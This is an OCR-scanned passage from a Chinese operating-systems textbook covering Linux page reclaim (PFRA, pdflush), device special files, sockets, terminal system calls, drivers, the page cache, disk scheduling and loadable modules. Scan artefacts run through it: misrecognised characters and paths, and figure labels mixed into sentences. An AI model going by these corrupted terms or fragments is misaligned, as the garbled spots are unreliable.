理 更 难 的 。 可 丢弃 页 面 和 未 被 引用 的 页 面 都 可 以 把 它们 添加 到 区 域 的 空 闪 链表 中 从 而 立即 回收 。 接 着 它 
查找 有 备份 存储 同时 近期 未 被 使 用 的 页 面 ， 使 用 一 个 类 似 于 时 钟 的 算法 。 再 后 来 就 是 用 户 使 用 不 多 的 共 
享 页 面 。 共 享 页 面 带 来 的 挑战 是 ， 如 果 一 个 页 面 被 回收 ,那么 所 有 共享 了 该 页 面 的 所 有 地 址 空间 的 页 表 
都 要 同步 更 新 。Linux 维 护 高 效 的 类 树 数据 结构 来 方便 地 找到 一 个 共享 页 面 的 所 有 使 用 者 。 接 下 来 是 普 
通用 户 页 面 ， 如 果 被 选中 换 出 ， 它 们 必须 被 调度 写 入 交换 区 。 系 统 的 swappiness， 即 有 备份 存储 的 页 面 
和 在 PFRA 中 被 换 出 的 页 面 的 比率 ， 是 该 算法 的 一 个 可 调 参 数 。 最 后 ， 如 果 一 个 页 是 无 效 的 、 不 在 内 存 、 
共享 、 锁 定 在 内 存 或 者 拥有 DMA， 那 么 它 被 跳 过 。 

PFRA 用 一 个 类 似 时钟 的 算法 来 选择 旧 页 面 换 出 。 这 个 算法 的 核心 是 一 个 循环 ， 它 扫描 每 个 区 域 的 
活动 和 非 活动 列表 ， 试 图 按照 不 同 的 紧迫 程度 回收 不 同类 型 的 页 面 。 紧 迫 性 数值 作为 一 个 参数 传递 给 该 
过 程 ， 说 明 花费 多 大 的 代价 来 回收 一 些 页 面 。 通 常 ， 这 意味 着 在 放弃 之 前 检查 多 少 个 页 面 。 

在 PFRA 期 间 ， 页 面 按照 图 10-18 描 述 的 方式 在 活动 和 非 活动 列表 之 间 移 来 移 去 。 为 了 维护 一 些 启发 
式 方 法 并 且 尽 量 找 出 没有 被 引用 的 和 近期 不 可 能 被 使 用 的 页 面 ， PFRA 为 每 个 页 面 维护 两 个 标记 : 活动 / 
非 活 动 和 是 否 被 引用 。 这 两 个 标记 构成 四 种 状态 ， 如 


图 10-18 所 示 。 在 对 一 个 页 面 集合 的 第 一 遍 扫 描 中 ， pas Se 
PFRA 首 先 清除 它们 的 引用 位 。 如 果 在 第 二 次 运行 其 
间 确 定 它 已 经 被 引用 ， 则 把 它 提升 到 另 一 个 状态 ， 这 PG_referenced=0 777 PG_referenced = 0 
样 就 不 太 可 能 回收 它 了 。 否 则 ， 将 该 页 面 移动 到 一 个 








更 可 能 被 回收 的 状态 。 

处 在 非 活动 列表 上 的 页 面 ， 自 从 上 次 检查 未 被 。 被 使 用 
引用 过 ， 故 而 是 移出 的 最 佳 候 选 。 有 些 页 面 的 
PG_active 和 PG _referenced 都 被 置 为 0， 如 图 10-18 所 


示 。 然 而 ， 如 果 需 要 ， 处 于 其 他 状态 的 页 面 也 可 能 |PG_referenced=1[ 一 
会 被 回收 。 图 10-18 中 的 重 装 箭头 就 说 明 这 个 事实 。 


PFRA 维 护 一 些 页 面 ， 尽 管 这 些 页 面 可 能 已 经 被 : 
引用 但 在 非 活动 列表 中 ， 其 原因 是 为 了 避免 如 下 的 情 AS ROR ne ee 
形 。 考 虑 一 个 进程 周期 性 访问 不 同 的 页 面 ， 比 如 周期 为 1 个 小 时 。 从 最 后 一 次 循环 开始 被 访问 的 页 面 会 设 
置 其 引用 标志 位 。 然 而 ， 接 下 来 的 一 个 小 时 里 不 再 使 用 它 ， 没 有 理由 不 考虑 把 它 作为 一 个 回收 的 候选 。 

我 们 还 没有 提 及 的 内 存 管理 系统 的 一 个 方面 是 另 一 个 守护 进程 pdflush， 实 际 上 就 是 一 组 后 台 守 护 线 
程 。pdflush 线 程 要 么 (1) 周期 性 醒 来 (通常 是 每 500ms)， 把 非常 旧 的 “ 脏 ”(dirty) 页 面 写 回 到 磁盘 ， 
要 么 (2) 当 可 用 的 内 存 水 平 下 降 到 一 个 浆 值 时 由 内 核 显 式 唤醒 ， 把 页 面 缓 存 的 “ 脏 ” 页 面 写 回 到 磁盘 。 
在 便携 模式 (laptop mode) 下 ,为 了 保留 电池 寿命 ， 每 次 pdflush 线 程 醒 来 ,，“ 脏 ”页 面 就 被 写 到 磁盘 。 
“ 脏 ” 页 面 也 可 以 通过 显 式 的 同步 请 求 写 出 到 磁盘 ， 比 如 通过 系统 调用 sync、fsync 或 者 fdatasync。 更 早 
的 Linux 版 本 使 用 两 个 单独 的 守护 进程 kupdate， 用 于 写 回 旧 页 面 ，bdflush， 用 于 在 低 内 存 的 情况 下 写 
回 页 面 。 在 2.4 版 本 内 核 中 这 个 功能 被 整合 到 pdflush 线 程 当中 了 。 选 择 多 线程 是 为 了 隐藏 长 的 磁盘 延迟 。 


10.5 Linux 中 的 I/O 系 统 


Linux 和 其 他 的 UNIX 系 统一 样 ，I/O 系 统 都 相当 的 简单 明了 。 通 常情 况 下 ， 所 有 的 1/O 设 备 都 被 当 作 
文件 来 处 理 ， 并 且 通 过 与 访问 所 有 文件 同样 的 read 和 write 系统 调用 来 访问 。 在 某 些 情 况 下 ， 必 须 通过 一 
个 特殊 的 系统 调用 来 设置 设备 的 参数 。 我 们 会 在 下 面 的 章节 中 学 习 这 些 细 节 。 


10.5.1 基本 概念 
像 所 有 的 计算 机 一 样 ， 运 行 Linux 的 计算 机 具有 了 磁盘、 打印 机 、 网 络 等 IO 设备 。 需 要 一 些 策 略 才 能 





& 
7 


_ RI: UNIX, LinuxfeAndroid BS 


使 程序 能 够 访问 这 些 设 备 。 有 很 多 不 同 的 方法 都 可 以 达到 这 个 目的 ，Linux 把 设备 当 作 一 种 特殊 文件 整 
合 到 文件 系统 中 。 每 个 IO 设备 都 被 分 配 了 一 条 路 径 ， 通 常 在 /dev 目 录 下 。 例 如 : 一 个 磁盘 的 路 径 可 能 是 
“/dev/hd1”， 一 个 打印 机 的 路 径 可 能 是 “/dev/lp”， 网 络 的 路 径 可 能 是 “/dev/net”。 

可 以 用 与 访问 其 他 普通 文件 相同 的 方式 来 访问 这 些 特 殊 文 件 。 不 需要 特殊 的 命令 或 者 系统 调用 。 常 
用 的 open、read、write 等 系统 调用 就 够 用 了 。 例 如 : 下 面 的 命令 

cp file /dev/lp 


把 文件 “file” 复 制 到 打印 机 “/dewip”， 然 后 开始 打印 〈 假 设 用 户 具 有 访问 “/devwlp” 的 权限 ) 。 程 序 能 
够 像 操 作 普 通 文件 那样 打开 、 读 、 写 特殊 文件 。 实 际 上 ， 上 面 的 “cp” 命 令 甚 至 不 知道 是 要 打印 “file” 
文件 。 通 过 这 种 方法 ， 不 需要 任何 特殊 的 机 制 就 能 进行 IO。 

特殊 文件 (设备 ) 分 为 两 类 ， 块 特殊 文件 和 字符 特殊 文件 。 一 个 块 特殊 文件 由 一 组 具有 编号 的 块 组 
成 。 块 特殊 文件 的 主要 特性 是 : 每 一 个 块 都 能 够 被 独立 地 寻 址 和 访问 。 也 就 是 说 ， 一 个 程序 能 够 打开 一 
个 块 特殊 文件 ， 并 且 不 用 读 第 0 块 到 第 123 块 就 能 够 读 第 124 块 。 磁 盘 就 是 块 特殊 文件 的 典型 应 用 。 

字符 特殊 文件 通常 用 于 表示 输入 和 输出 字符 流 的 设备 。 键 盘 、 打 印 机 、 网 络 、 鼠 标 、 绘 图 机 以 及 大 
部 分 接受 用 户 数据 或 向 用 户 输出 数据 的 设备 都 使 用 字符 特殊 文件 来 表示 。 访 问 一 个 鼠标 的 第 124 块 是 不 
可 能 的 〈 甚 至 是 无 意义 的 ) 。 

每 个 特殊 文件 都 和 一 个 处 理 其 对 应 设备 的 设备 驱动 相关 联 。 每 个 驱动 程序 都 通过 一 个 主 设备 号 来 标 
识 。 如 果 一 个 驱动 程序 支持 多 个 设备 ， 如 ， 相 同类 型 的 两 个 磁盘 ， 每 个 磁盘 使 用 一 个 次 设备 号 来 标识 。 
主 设备 号 和 次 设备 号 结合 在 一 起 能 够 唯一 地 确定 每 个 1/0 设 备 。 在 很 少 的 情况 下 ,一 个 单独 的 驱动 程序 
处 理 两 种 关系 密切 的 设备 。 比 如 : 与 “/dev/tty” 联 合 的 驱动 程序 同时 控制 着 键盘 和 显示 器 ， 这 两 种 设备 
通常 被 认为 是 一 种 设备 ， 即 终端 。 

大 部 分 的 字符 特殊 文件 都 不 能 够 被 随机 访问 , 因此 它们 通常 需要 用 不 同 于 块 特殊 文件 的 方式 来 控制 。 
比如 ， 由 键盘 上 键入 输入 字符 并 显示 在 显示 器 上 。 当 一 个 用 户 键 入 了 一 个 错误 的 字符 ， 并 且 想 取消 键入 
的 最 后 一 个 字符 时 ， 他 训 击 其 他 的 键 。 有 人 喜欢 使 用 “backspace” 回 退 键 ， 也 有 人 喜欢 “del” 删 除 键 。 
类 似 地 ， 为 了 取消 刚 键入 的 一 行 字符 ， 也 有 很 多 方法 。 传 统 的 方法 是 输入 “@”， 但 是 随 着 e-mail 的 传播 
(在 电子 邮件 地 址 中 使 用 @)， 一 些 系统 使 用 “CTRL+U” 或 者 其 他 字符 来 达到 目的 。 同 样 的， 为 了 中 上 断 
正在 运行 的 程序 ， 需 要 使 用 一 些 特殊 的 键 。 不 同 的 人 有 不 同 的 偏爱 。“CTRL+C” 是 常用 的 方法 ， 但 不 
是 唯一 的 。 

Linux 允 许 用 户 自 定义 这 些 特 殊 的 功能 ， 而 不 是 强迫 每 个 人 使 用 系统 选择 的 那 种 。Linux 提 供 了 一 个 
专门 的 系统 调用 来 设置 这 些 选项 。 这 个 系统 调用 也 处 理 tab 扩 展 ， 字 符 输出 有 效 、 失 效 ， 回 车 和 换行 之 间 
的 转换 等 类 似 的 功能 。 这 个 系统 调用 不 能 用 于 普通 文件 和 块 特殊 文件 。 


10.5.2 网 络 

IO 的 另外 一 个 例子 是 网 络 ， 由 Berkeley UNIX 首 创 并 在 Linux 中 差不多 原封 不 动 地 引入 。 在 Berkeley 的 设 
计 中 ， 关 键 概念 是 套 接 字 (socket)。 套 
接 字 与 邮 简 和 墙壁 上 的 电话 揪 座 是 类 似 
的 ， 因 为 套 接 字 允 许 用 户 连接 到 网 络 ， 
正如 邮 简 允许 用 户 连 接 到 邮政 系统 ， 墙 
壁 上 的 电话 插座 允许 用 户 插入 电话 并 且 
连接 到 电话 系统 。 套 接 字 的 位 置 见 图 10- 
19。 套 接 字 可 以 被 动态 创建 和 销毁 。 创 
建 一 个 套 接 字 成 功 后 ， 系 统 返回 一 个 文 


发 送 进 程 接收 进程 








用 户 空 间 


内 核 空间 


件 描述 符 。 创 建 连 接 、 读 数据 、 写 数据 、 ae 
解除 连接 时 要 用 到 这 个 文件 描述 符 。 区 
每 个 套 接 字 支 持 一 种 特定 的 网 络 810-19 Aare 


类 型 ， 这 在 套 接 字 创 建 时 指定 。 最 常用 的 类 型 是 : 
1) 可 靠 的 面向 连接 的 字 节 流 。 


436 党 10 章 





2) 可 靠 的 面向 连接 的 数据 包 流 。 

3) 不 可 靠 的 数据 包 传输 。 

第 一 种 套 接 字 类 型 允许 在 不 同 机 器 上 的 两 个 进程 之 间 建 立 一 个 等 同 于 管道 的 连接 。 字 节 从 一 个 端点 
注入 然后 按 注入 的 顺序 从 另外 一 个 端点 流出 。 系 统 保证 所 有 被 传送 的 字 节 都 能 够 到 达 ， 并 且 按 照发 送 时 
的 顺序 到 达 。 

除 保 留 了 数据 包 之 间 的 分 界 之 外 ， 第 二 种 类 型 和 第 一 种 是 类 似 的 。 如 果 发 送 者 调用 了 5 次 写 操作 ， 
每 次 写 了 512 字 节 ， 而 接收 者 要 接收 2560 字 节 ， 那 么 使 用 第 一 种 类 型 的 套 接 字 ， 接 收 者 接收 一 次 会 立刻 
接收 到 所 有 2560 个 字 节 。 要 是 使 用 第 二 种 类 型 的 套 接 字 ， 接 收 者 一 次 只 能 收 到 512 个 字 节 ， 而 要 得 到 剩 
下 的 数据 ， 还 需要 再 进行 4 次 调用 。 用 户 可 以 使 用 第 三 种 类 型 的 套 接 字 来 访问 原始 网 络 。 这 种 类 型 的 套 
接 字 尤 其 适用 于 实时 应 用 和 用 户 想 要 实现 特定 错误 处 理 模 式 的 情况 。 数 据 包 可 能 会 丢失 或 者 被 网 络 重 排 
序 。 和 前 两 种 方式 不 同 ， 这 种 方式 没有 任何 保证 。 第 三 种 方式 的 优点 是 有 更 高 的 性 能 ， 而 有 时 候 它 比 可 
靠 性 更 加 重要 (如 在 传输 多 媒体 时 ， 快 速 比 正确 性 更 有 用 )。 

在 创建 套 接 字 时 ， 有 一 个 参数 指定 使 用 的 协议 。 对 于 可 靠 字 节 流 通信 来 说 ， 使 用 最 广泛 的 协议 是 
TCP (传输 控制 协议 ) 。 对 于 不 可 靠 数 据 包 传输 来 说 ，UDP (用 户 数据 报 协议 ) 是 最 常用 的 协议 。 这 两 
种 协议 都 位 于 IP (互联 网 协议 ) 层 之 上 。 这 些 协议 都 源 于 美国 国防 部 的 ARPANET， 并 成 为 现在 互联 网 
的 基础 。 目 前 没有 可 靠 数 据 包 流 类 型 的 通用 协议 。 

在 一 个 套 接 字 能 够 用 于 网 络 通信 之 前 ， 必 须 有 一 个 地 址 与 它 绑 定 。- 这 个 地 址 可 以 是 几 个 命名 域 中 的 
一 个 。 最 常用 的 域 为 互联 网 (Internet) 命名 域 ， 它 在 V4 (第 4 个 版 本 ) 中 使 用 32 位 整数 作为 其 命名 端点 ， 
在 V6 中 使 用 128 位 整数 (V5 是 一 个 实验 系统 ， 从 未 成 为 主流 )。 

一 旦 套 接 字 在 源 计算 机 和 目的 计算 机 都 建立 成 功 ， 则 两 个 计算 机 之 间 可 以 建立 起 一 个 连接 (对 于 面 
向 连接 的 通信 来 说 ) 。 一 方 在 本 地 套 接 字 上 使 用 一 个 listen 系 统 调 用 ， 它 创建 一 个 缓冲 区 并 且 阻 塞 ， 直 到 
数据 到 来 。 另 一 方 使 用 connect 系 统 调用 ， 并 且 把 本 地 套 接 字 的 文件 描述 符 和 远程 套 接 字 的 地 址 作为 参 
数 传递 进去 。 如 果 远 程 一 方 接受 了 此 次 调用 ， 则 系统 在 两 个 套 接 字 之 间 建 立 起 一 个 连接 。 

一 旦 连接 建立 成 功 ， 它 的 功能 就 类 似 于 一 个 管道 。 一 个 进程 可 以 使 用 本 地 套 接 字 的 文件 描述 符 来 从 
中 读 写 数据 。 当 此 连接 不 再 需要 时 ， 可 以 用 常用 的 方式 ， 即 通过 close 系 统 调用 来 关闭 它 。 


10.5.3 Linux 中 的 VO 系 统 调用 

Linux 系 统 中 的 每 个 O 设 备 都 有 一 个 特殊 文件 与 其 关联 。 大 部 分 的 MO 只 使 用 合适 的 文件 就 可 以 完 
成 ， 并 不 需要 特殊 的 系统 调用 。 然 而 ， 有 时 需要 一 些 设备 专用 的 处 理 。 在 POSIX 之 前 ， 大 部 分 UNIX 系 
统 有 一 个 叫 作 ioctl 的 系统 调用 ， 它 在 特殊 文件 上 执行 大 量 设备 专用 的 操作 。 数 年 之 间 ， 此 系统 调用 已 经 
变 得 非常 混乱 。POSIX 对 其 进行 了 清理 ， 把 它 的 功能 划分 为 主要 面向 终端 设备 的 独立 的 功能 调用 。 在 
Linux 和 现代 UNIX 系 统 中， 每 个 功能 调用 是 独立 的 系统 调用 ， 还 是 它们 共享 一 个 单独 的 系统 调用 或 依赖 
于 实现 的 其 他 方式 。 

在 图 10-20 中 的 前 4 个 系统 调用 用 来 设置 
和 获取 终端 速度 。 为 输入 和 输出 提供 不 同 的 
系统 调用 是 因为 一 些 调制 解 调 器 工作 速率 不 
同 。 例 如 ， 旧 的 可 视图 文系 统 允 许 用 户 在 家 
通过 短 请 求 以 75 位 /s 的 上 传 速 度 访问 服务 器 上 
的 公共 数据 ， 而 下 载 速度 为 1200 位 /s。 这 个 
标准 在 一 段 时 间 内 被 采用 ， 因 为 对 于 家 庭 应 s=tcgetattr (fd,&termios ) 

用 来 说 ,输入 输出 时 都 采用 1200 位 / 秒 则 太 昂 图 10-20 管理 终端 的 主要 POSIX 系 统 调用 

贵 了 。 网 络 世界 中 的 时 代 已 经 改变 了 。 电 话 

公司 提供 ADSL 服 务 ， 即 20Mb/s 的 入 站 服务 和 2Mb/s 的 出 站 服务 ， 导 臻 输入 和 输出 速度 不 对 等 的 情况 继 
续 存在 。 

列表 中 的 最 后 两 个 系统 调用 主要 用 来 设置 和 读 回 所 有 用 来 消除 字符 和 行 以 及 中 断 进程 等 功能 的 特殊 
字符 。 另 外 ， 它 们 可 以 使 回 显 有 效 或 无 效 ， 处 理 流 的 控制 以 及 执行 其 他 相关 功能 。 还 有 一 些 1/0 功 能 调 








Epl: UNIX, Linux#eAndroid 437 


用 ， 但 是 它们 都 是 专用 的 ， 所 以 这 里 就 不 进一步 讨论 了 。 此 外 ，ioctl 系 统 调 用 依然 可 用 。 


10.5.4 ”I/O 在 Linux 中 的 实现 

在 Linux 中 1/0 是 通过 一 系列 的 设备 驱动 来 实现 的 ， 每 个 设备 类 型 对 应 一 个 设备 驱动 。 设 备 驱 动 的 功 
能 是 对 系统 的 其 他 部 分 隔离 硬件 的 特质 。 通过 在 驱动 程序 和 操作 系统 其 他 部 分 之 间 提供 一 层 标准 的 接口 ， 
使 得 大 部 分 IO 系统 可 以 被 划 归 到 内 核 的 机 器 无 关 部 分 。 

当 用 户 访问 一 个 特殊 文件 时 ， 由 文件 系统 提供 此 特殊 文件 的 主 设备 号 和 次 设备 号 ， 并 判断 它 是 一 个 
块 特殊 文件 还 是 一 个 字符 特殊 文件 。 主 设备 号 用 于 索引 存 有 字符 设备 或 者 块 设备 数据 结构 的 两 个 内 部 散 
列表 之 一 。 定 位 到 的 数据 结构 包含 指向 打开 设备 、 读 设备 、 写 设备 等 功能 的 函数 指针 。 次 设备 号 被 当 作 
参数 传递 。 在 Linux 系 统 中 添加 一 个 新 的 设备 类 型 ， 意 味 着 要 向 这 些 表 添加 一 个 新 的 表 项 ， 并 提供 相应 
的 函数 来 处 理 此 设备 上 的 各 种 操作 。 

图 10-21 展 示 了 一 部 分 可 以 跟 不 同 的 字符 设备 关联 的 操作 。 每 一 行 指向 一 个 单独 的 IO 设备 〈 即 一 个 
单独 的 驱动 程序 ) 。 列 表示 所 有 的 字符 驱动 程序 必须 支持 的 功能 。 除 此 之 外 ， 还 有 几 个 其 他 的 功能 。 当 
一 个 操作 要 在 一 个 字符 特殊 文件 上 执行 时 ， 系 统 通过 检索 字符 设备 的 散 列表 来 选择 合适 的 数据 结构 ， 然 
后 调用 相应 的 功能 来 执行 此 操作 。 因 此 ， 每 个 文件 操作 都 包含 指向 相应 驱动 程序 的 一 个 函数 指针 。 


Open Close Read Write loctl | 其 他 
at, null null null null null ve 
内 存 null null mem_read mem_write null e 


| = k_open | k_close k_read error k_ioctl we 
tty_open | tty_close tty_read tty_write tty_ioctl oe 
打 lp_open | lp_close error | Ip_write Ip_ioctl ve 


图 10-21 典型 字符 设备 支持 的 部 分 文件 操作 


每 个 驱动 程序 都 分 为 两 部 分 。 这 两 部 分 都 是 Linux 内 核 的 一 部 分 ， 并 且 都 运行 在 内 核 态 。 上 半 部 分 
运行 在 调用 者 的 上 下 文 并且 与 Linux 其 他 部 分 交互 。 下 半 部 分 运行 在 内 核 上 下 文 并 且 与 设备 进行 交互 。 
驱动 程序 可 以 调用 内 存 分 配 、 定 时 器 管理 、DMA 控 制 等 内 核 过 程 。 所 有 可 以 被 调用 的 内 核 功能 都 定义 
在 一 个 叫 作 驱动 程序 一 内 核 接 口 (Driver-Kernel Interface) 的 文档 中 。 编 写 Linux 设 备 驱动 的 细节 请 参见 
Cooper stein (2009) 和 Corbet 等 人 (2009) 的 文献 。 

I/O 系 统 被 划分 为 两 大 部 分 : 处 理 块 特殊 文件 的 部 分 和 处 理 字符 特殊 文件 的 部 分 。 下 面 将 依次 讨论 
这 两 部 分 。 

系统 中 处 理 块 特殊 文件 (比如 ， 磁 盘 ) IO 的 部 分 的 目标 是 使 必须 要 完成 的 传输 次 数 最 小 。 为 了 实 
现 这 个 目标 ，Linux 系 统 在 磁盘 驱动 程序 和 文件 系统 之 间 设 置 了 一 个 高 速 缓存 (cache) ， 如 图 10-22。 在 
2.2 版 本 内 核 之 前 ，Linux 系 统 完 整地 维护 着 两 个 单独 的 缓存 : 页 面 缓存 (page cache) 和 缓冲 器 缓存 
(buffer cache) ， 因 此 ， 存 储 在 一 个 磁盘 块 中 的 文件 可 能 会 被 缓存 在 两 个 缓 在 中 。2.2 版 本 以 后 的 Linux 内 
核 版 本 只 有 一 个 统一 的 缓存 。 一 个 通用 数据 块 层 (generic block layer) 把 这 些 组 件 整合 在 了 一 起 ， 执 行 
磁盘 扇 区 、 数 据 块 、 缓 冲 区 和 数据 页 面 之 间 必 要 的 转换 ， 并 且 激 活 作 用 于 这 些 结构 上 的 操作 。 

cache 是 内 核 里 面 用 来 保存 数 以 千 计 的 最 近 使 用 的 数据 块 的 表 。 不 管 本 着 什么 样 的 目的 〈i 节 点 ， 目 
录 或 数据 ) 而 需要 一 个 磁盘 块 ， 系 统 首 先 检 查 这 个 块 是 否 在 cache 里 面 。 如 果 在 cache 中 ， 就 可 以 从 cache 
里 直接 得 到 这 个 块 ， 从 而 避免 了 一 次 磁盘 访问 ， 这 可 以 在 很 大 程度 上 提高 系统 性 能 。 

如 果 页 面 cache 中 没有 这 个 块 ， 系 统 就 会 从 磁盘 中 把 这 个 块 读 入 到 cache 中 ， 然 后 再 从 cache 中 复制 到 
请 求 它 的 地 方 。 由 于 页 面 cache 的 大 小 是 固定 的 ， 因 此 ， 前 面 章节 介绍 的 页 面 置换 算法 在 这 里 也 是 需要 的 。 

页 面 cache 也 支持 写 数据 块 ， 就 像 读 数据 一 样 。 一 个 程序 要 回 写 一 个 块 时 ， 它 被 写 到 cache 里 ， 而 不 
是 直接 写 到 磁盘 上 。 当 cache 增 长 到 超过 一 个 指定 值 时 ，pdflush 守 护 进 程 会 把 这 个 块 写 回 到 磁盘 上 。 男 
外 ， 为 了 防止 数据 块 被 写 回 到 磁盘 之 前 在 cache 里 存留 太 长 时 间 ， 每 隔 30 秒 系统 会 把 所 有 的 “ 脏 块 ”都 
写 回 到 磁盘 上 。 
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图 10-22 Linux IO 系统 中 一 个 文件 系统 的 细节 


Linux 依 靠 一 个 IO 调度 器 来 保证 磁头 反复 移动 以 减少 延迟 。LI/O 调 度 器 的 作用 是 对 块 设备 的 读 写 请 
求 重新 排序 或 对 这 些 读 写 请 求 进行 合并 。 有 很 多 调度 器 变种 ， 它 们 是 根据 不 同类 型 的 工作 负载 进行 优化 
的 结果 。 基 本 的 Linux IO 调度 器 基于 最 初 的 Linus 电 梯 调度 器 (Linus Elevator scheduler) 。 电 梯 调 度 器 
的 操作 可 以 这 样 总 结 : 按 磁盘 请 求 的 扇 区 地 址 的 顺序 将 磁盘 操作 在 一 个 双向 链表 中 排序 。 新 的 请 求 以 排 
序 的 方式 插入 到 双向 链表 中 。 这 种 方法 可 以 有 效 地 防止 磁头 重复 移动 。 请 求 列表 经 过 合并 后 ， 相 邻 的 操 
作 会 被 整合 为 一 条 单独 的 磁盘 请 求 。 基 本 电梯 调度 器 有 一 个 问题 是 会 导致 饥饿 的 情况 发 生 。 因 此 ， 
Linux 磁 盘 调 度 器 的 修改 版 本 包括 两 个 附加 的 列表 ， 维 护 按时 限 (deadline) 排序 的 读 写 操作 。 读 请 求 的 
缺 省 时 限 是 0.5s， 写 请 求 的 缺 省 时 限 是 5s。 如 果 最 早 的 写 操作 的 系统 定义 的 时 限 要 过 期 了 ， 那 么 相对 于 
任何 在 主 双向 链表 中 的 请 求 来 说 ， 这 个 写 请 求 会 被 优先 服务 。 

除了 正常 的 磁盘 文件 ， 还 有 其 他 的 块 特殊 文件 ， 也 被 称 为 原始 块 文件 (raw block file)。 这 些 文件 
允许 程序 通过 绝对 块 号 来 访问 磁盘 ， 而 不 考虑 文件 系统 。 它 们 通常 被 用 于 分 页 和 系统 维护 。 

与 字符 设备 的 交互 是 很 简单 的 。 因 为 字符 设备 产生 和 接收 的 是 字符 流 或 字 节 数据 ， 所 以 让 字符 设备 
支持 随机 访问 是 几乎 没有 意义 的 。 不 过 行规 则 (line disciplines) 的 使 用 是 个 例外 。 一 个 行规 则 可 以 和 一 
个 终端 设备 联合 在 一 起 ， 通 过 tty_struct 结 构 来 表示 ， 一 般 作 为 和 终端 交换 的 数据 的 解释 器 。 例 如 ， 利 用 
行规 则 可 以 完成 本 地 行 编 辑 ( 即 擦 除 的 字符 和 行 可 以 被 删除 )， 回 车 可 以 映射 为 换行 ， 以 及 其 他 的 特殊 
处 理 能 够 被 完成 。 然 而 ， 如 果 一 个 进程 要 跟 每 个 字符 交互 ， 那 么 它 可 以 把 行 设置 为 原始 模式 ， 此 时 行规 
则 将 被 忽略 。 另 外 ， 并 不 是 所 有 的 设备 都 有 行规 则 。 

输出 采用 与 输入 类 似 的 工作 方式 ， 如 把 tab 扩 展 为 空格 ， 把 换行 转变 为 回 车 十 换行， 在 慢 的 机 械 式 
终端 的 回 车 后 面 加 填充 字符 等 。 像 输入 一 样 ， 输 出 可 以 通过 (加工 模式 ) 行规 则 ,或 者 忽略 (原始 模式 ) 
行规 则 。 原 始 模 式 对 于 GUI 和 通过 一 个 串 行 数据 线 发 送 二 进 制 数据 到 其 他 的 计算 机 的 情况 尤 基 有用， 因 
为 这 些 情况 都 不 需要 进行 转换 。 

和 网 络 设 备 的 交互 与 前 面 的 讨论 有 些 不 同 。 虽 然 网 络 设备 也 是 产生 或 者 接收 字符 流 ， 但 是 它们 的 异 
步 特性 使 得 它们 并 不 适合 与 其 他 的 字符 设备 统一 使 用 相同 的 接口 。 网 络 设备 驱动 程序 产生 具有 多 个 字 节 
的 数据 包 和 网 络 头 。 接 着 ， 这 些 包 会 经 过 一 连 串 的 网 络 协议 驱动 程序 传送 ， 最 后 被 发 送 到 用 户 空间 应 用 
程序 。 套 接 字 缓冲 区 skbufft 是 一 个 关键 的 数据 结构 ， 它 用 来 表示 填 有 包 数 据 的 部 分 内 存 。 由 于 数据 会 被 
网 络 栈 中 的 不 同 协议 处 理 过 ， 可 能 会 添加 或 删除 协议 头 ， 所 以 skbuff 缓 冲 区 里 面 的 数据 并 不 总 是 始 于 缓 
冲 区 的 开始 位 置 。 用 户 进程 通过 套 接 字 与 网 络 设备 进行 交互 ， 在 Linux 中 支持 原始 的 BSD 的 套 接 字 API。 
通过 raw_sockets， 协 议 驱 动 程序 可 以 被 忽略 ， 从 而 可 以 实现 对 底层 网 络 设 备 的 直接 访问 。 只 有 超级 用 户 
才 可 以 创建 原始 套 接 字 (raw socket)。 
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10.5.5 Linux 中 的 模块 

几 十 年 来 ，UNIX 设 备 驱动 程序 是 被 静态 链接 到 内 核 中 的 。 因 此 ， 只 要 系统 启动 ， 设 备 驱 动 程序 都 
会 被 加 载 到 内 存 中 。 在 UNIX 比 较 成 熟 的 环境 中 ， 如 大 部 分 的 部 门 小 型 计算 机 以 及 高 端的 工作 站 ， 其 共 
同 的 特点 是 IO 设备 集 都 较 小 并 且 稳定 不 变 ， 这 种 模式 工作 得 很 好 。 基 本 上 ， 一 个 计算 机 中 心 会 构造 一 
个 包含 IO 设备 驱动 程序 的 内 核 ， 并 且 一 直 使 用 它 。 如 果 第 二 年 ， 这 个 中 心 买 了 一 个 新 的 磁盘 ， 那 么 重 
新 链接 内 核 就 可 以 了 。 一 点 问题 也 没有 。 

随 着 个 人 电脑 平台 Linux 系 统 的 到 来 ， 所 有 这 些 都 改变 了 。 相 对 于 任何 一 台 小 型 机 上 的 IO 设备 ，PC 上 
可 用 IO 设备 的 数量 都 有 了 数量 级 上 的 增长 。 另 外 ， 虽 然 所 有 的 Linux 用 户 都 有 (或 者 很 容易 得 到 ) Linux 源 
代码 ， 但 是 绝 大 部 分 用 户 都 没有 能 力 去 添加 一 个 新 的 驱动 程序 、 更 新 所 有 的 设备 驱动 程序 数据 结构 、 重 链 
接 内 核 ， 然 后 把 它 作为 可 启动 的 系统 进行 安装 (更 不 用 提要 处 理 构造 完成 后 内 核 不 能 启动 的 问题 ) 。 

Linux 为 了 解决 这 个 问题 ， 引 入 了 可 加 载 模块 (loadable module) 的 概念 。 可 加 载 模块 是 在 系统 运 
行 时 可 以 加 载 到 内 核 的 代码 块 。 大 部 分 情况 下 ， 这 些 模 块 是 字符 或 者 块 设 备 驱动 ， 但 是 它们 也 可 以 是 完 
整 的 文件 系统 、 网 络 协 议 、 性 能 监控 工具 或 者 其 他 想 要 添加 的 模块 。 

当 一 个 模块 被 加 载 到 内 核 时 ， 会 发 生 下 面 几 件 事 。 第 一 ， 在 加 载 过程 中 ， 模 块 会 被 动态 地 重新 部 署 。 
第 二 ， 系 统 会 检查 这 个 驱动 程序 需要 的 资源 是 否 可 用 (例如 ， 中 断 请 求 级 别 ) 。 如 果 可 用 ， 则 把 这 些 资 源 
标记 为 正在 使 用 。 第 三 ， 设 置 所 有 需要 的 中 断 向 量 。 第 四 ,更 新 驱动 转换 表 使 其 能 够 处 理 新 的 主 设备 类 型 。 
最 后 ， 运 行 驱动 程序 来 完成 可 能 需要 的 特定 设备 的 初始 化 工作 。 一 旦 上 述 所 有 的 步骤 都 完成 了 ， 这 个 驱动 
程序 就 安装 完成 了 ， 也 就 和 静态 安装 的 驱动 程序 一 样 了 。 其 他 现代 的 UNIX 系 统 也 支持 可 加 载 模块 。 


10.6 Linux 文 件 系统 


在 包括 Linux 在 内 的 所 有 操作 系统 中 ， 最 可 见 的 部 分 是 文件 系统 。 在 本 节 的 以 下 部 分 ， 我 们 将 介绍 
隐藏 在 Linux 文 件 系统 、 系 统 调 用 以 及 文件 系统 实现 背后 的 基本 思想 。 这 些 思想 中 有 一 些 来 源 于 
